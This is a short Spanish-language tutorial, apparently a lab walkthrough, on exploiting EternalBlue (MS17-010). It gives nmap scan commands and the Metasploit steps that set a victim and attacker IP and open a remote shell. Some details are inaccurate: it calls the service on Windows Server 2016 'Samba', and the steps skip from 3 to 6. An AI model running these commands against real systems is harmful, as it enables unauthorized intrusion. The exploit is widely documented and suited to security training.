🔥 ¿Qué es EternalBlue? 🔥

EternalBlue es una vulnerabilidad crítica en el protocolo SMB (Server Message Block) de Windows, revelada en 2017. Fue filtrada por el grupo Shadow Brokers, y originalmente desarrollada por la NSA para operaciones de espionaje. Esta falla permite la ejecución remota de código sin necesidad de autenticación, abriendo una puerta trasera para el control total del sistema. 🚪🔓

Fue responsable de ataques globales como:

• WannaCry: ransomware que paralizó hospitales y empresas. 💸😱

• NotPetya: malware destructivo que afectó a Ucrania y más allá. 🌐⚠️

🔍 Paso 1: Escaneo con Nmap

nmap -v -A 10.129.7.128

📡 Detecta sistema: Windows Server 2016

🔧 Servicio vulnerable: Samba

⚠️ Vulnerabilidad probable: EternalBlue (MS17-010)

🚀 Paso 2: Abrir Metasploit

msfconsole

🔎 Paso 3: Buscar exploit EternalBlue

search MS17-010

📌 Seleccionar exploit:

use exploit/windows/smb/ms17_010_eternalblue

Utilizamos show options para ver cuales son los obligatorios

🎯 Configurar IPs:

set RHOSTS <IP_víctima>
set LHOST <IP_atacante>
run 
shell

🎉 Paso 6: Obtener shell interactiva
✅ ¡Acceso conseguido! 🎊

🛠️ Comandos útiles en Metasploit

show options   # Muestra parámetros configurables
info           # Información detallada del exploit
targets        # Lista objetivos soportados por el exploit